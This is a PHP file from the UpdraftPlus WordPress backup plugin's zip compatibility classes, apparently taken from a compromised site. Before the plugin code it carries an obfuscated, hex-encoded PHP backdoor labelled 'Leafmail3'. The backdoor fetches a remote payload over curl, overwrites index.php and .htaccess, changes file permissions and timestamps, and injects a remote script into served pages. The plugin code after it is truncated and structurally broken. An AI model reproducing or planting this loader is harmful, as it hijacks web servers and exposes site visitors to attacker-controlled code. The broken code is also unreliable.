[ Avaa Bypassed ]



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<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>

if (!defined('ABSPATH')) die('No direct access allowed');

if (class_exists('ZipArchive')) :
 * We just add a last_error variable for comaptibility with our UpdraftPlus_PclZip object
class UpdraftPlus_ZipArchive extends ZipArchive {

		public $last_error = 'Unknown: ZipArchive does not return error messages';

 * A ZipArchive compatibility layer, with behaviour sufficient for our usage of ZipArchive
class UpdraftPlus_PclZip {

	protected $pclzip;

	protected $path;

	protected $addfiles;

	protected $adddirs;

	private $statindex;

	private $include_mtime = false;

	public $last_error;

	 * Constructor
	public function __construct() {
		$this->addfiles = array();
		$this->adddirs = array();
		// Put this in a non-backed-up, writeable location, to make sure that huge temporary files aren't created and then added to the backup - and that we have somewhere writable
		global $updraftplus;
		if (!defined('PCLZIP_TEMPORARY_DIR')) define('PCLZIP_TEMPORARY_DIR', trailingslashit($updraftplus->backups_dir_location()));

	 * Used to include mtime in statindex (by default, not done - to save memory; probably a bit paranoid)
	 * @return null
	public function ud_include_mtime() {
		if (empty($this->include_mtime)) $this->statindex = null;
		$this->include_mtime = true;

	 * Magic function for getting an otherwise-undefined class variable
	 * @param String $name
	 * @return Boolean|Null|Integer - the value, or null if an unknown variable, or false if something goes wrong
	public function __get($name) {

		if ('numFiles' == $name) {

			if (empty($this->pclzip)) return false;

			if (!empty($this->statindex)) return count($this->statindex);

			$statindex = $this->pclzip->listContent();

			if (empty($statindex)) {
				$this->statindex = array();
				// We return a value that is == 0, but allowing a PclZip error to be detected (PclZip returns 0 in the case of an error).
				if (0 === $statindex) $this->last_error = $this->pclzip->errorInfo(true);
				return (0 === $statindex) ? false : 0;

			// We used to exclude folders in the case of numFiles (and implemented a private alternative, numAll, that included them), because we had no use for them (we ran a loop over $statindex to build a result that excluded the folders); but that is no longer the case (Dec 2018)
			$this->statindex = $statindex;
			return count($this->statindex);

		return null;


	 * Get stat info for a file
	 * @param Integer $i The index of the file
	 * @return Array - the stat info
	public function statIndex($i) {
		if (empty($this->statindex[$i])) return array('name' => null, 'size' => 0);
		$v = array('name' => $this->statindex[$i]['filename'], 'size' => $this->statindex[$i]['size']);
		if ($this->include_mtime) $v['mtime'] = $this->statindex[$i]['mtime'];
		return $v;

	 * Compatibility function for WP < 3.7; taken from WP 5.2.2
	 * @staticvar array $encodings
	 * @staticvar bool  $overloaded
	 * @param bool $reset - Whether to reset the encoding back to a previously-set encoding.
	private function mbstring_binary_safe_encoding($reset = false) {
		if (function_exists('mbstring_binary_safe_encoding')) return mbstring_binary_safe_encoding($reset);
		static $encodings  = array();
		static $overloaded = null;

		if (is_null($overloaded)) {
			$overloaded = function_exists('mb_internal_encoding') && (ini_get('mbstring.func_overload') & 2); // phpcs:ignore  PHPCompatibility.IniDirectives.RemovedIniDirectives.mbstring_func_overloadDeprecated

		if (false === $overloaded) {

		if (!$reset) {
			$encoding = mb_internal_encoding();
			array_push($encodings, $encoding);

		if ($reset && $encodings) {
			$encoding = array_pop($encodings);

	 * Compatibility function for WP < 3.7
	private function reset_mbstring_encoding() {
		return function_exists('reset_mbstring_encoding') ? reset_mbstring_encoding() : $this->mbstring_binary_safe_encoding(true);
	 * Returns the entry contents using its index. This is used only in PclZip, to get better performance (i.e. no such method exists on other zip objects, so don't call it on them). The caller must be careful not to request more than will fit into available memory.
	 * @see https://php.net/manual/en/ziparchive.getfromindex.php
	 * @param Array $indexes - List of indexes for entries
	 * @return Boolean|Array - Returns a keyed list (keys matching $indexes) of contents of the entry on success or FALSE on failure.
	public function updraftplus_getFromIndexBulk($indexes) {
		$results = array();
		// This is just for crazy people with mbstring.func_overload enabled (deprecated from PHP 7.2)
		$contents = $this->pclzip->extract(PCLZIP_OPT_BY_INDEX, $indexes, PCLZIP_OPT_EXTRACT_AS_STRING);

		if (0 === $contents) {
			$this->last_error = $this->pclzip->errorInfo(true);
			return false;
		if (!is_array($contents)) {
			$this->last_error = 'PclZip::extract() did not return the expected information (1)';
			return false;
		foreach ($contents as $item) {
			$index = $item['index'];
			$content = isset($item['content']) ? $item['content'] : '';
			$results[$index] = $content;
		return $results;
	 * Returns the entry contents using its index
	 * @see https://php.net/manual/en/ziparchive.getfromindex.php
	 * @param Integer $index  - Index of the entry
	 * @param Integer $length - The length to be read from the entry. If 0, then the entire entry is read.
	 * @param Integer $flags  - The flags to use to open the archive.
	 * @return String|Boolean - Returns the contents of the entry on success or FALSE on failure.
	public function getFromIndex($index, $length = 0, $flags = 0) {
		$contents = $this->pclzip->extract(PCLZIP_OPT_BY_INDEX, array($index), PCLZIP_OPT_EXTRACT_AS_STRING);
		if (0 === $contents) {
			$this->last_error = $this->pclzip->errorInfo(true);
			return false;
		// This also prevents CI complaining about an unused parameter
		if ($flags) {
			error_log("A call to UpdraftPlus_PclZip::getFromIndex() set flags=$flags, but this is not implemented");
		if (!is_array($contents)) {
			$this->last_error = 'PclZip::extract() did not return the expected information (1)';
			return false;
		$content = array_pop($contents);
		if (!isset($content['content'])) {
			$this->last_error = 'PclZip::extract() did not return the expected information (2)';
			return false;

		$results = $content['content'];
		return $length ? substr($results, 0, $length) : $results;
	 * Open a zip file
	 * @param String  $path	 - the filesystem path to the zip file
	 * @param Integer $flags - flags for the open operation (see ZipArchive::open() - N.B. may not all be implemented)
	 * @return Boolean - success or failure. Failure will set self::last_error
	public function open($path, $flags = 0) {
		if (!class_exists('PclZip')) include_once(ABSPATH.'/wp-admin/includes/class-pclzip.php');
		if (!class_exists('PclZip')) {
			$this->last_error = "No PclZip class was found";
			return false;

		// Route around PHP bug (exact version with the problem not known)
		$ziparchive_create_match = (version_compare(PHP_VERSION, '5.2.12', '>') && defined('ZIPARCHIVE::CREATE')) ? ZIPARCHIVE::CREATE : 1;

		if ($flags == $ziparchive_create_match && file_exists($path)) @unlink($path);// phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged -- Silenced to suppress errors that may arise if the file doesn't exist.

		$this->pclzip = new PclZip($path);

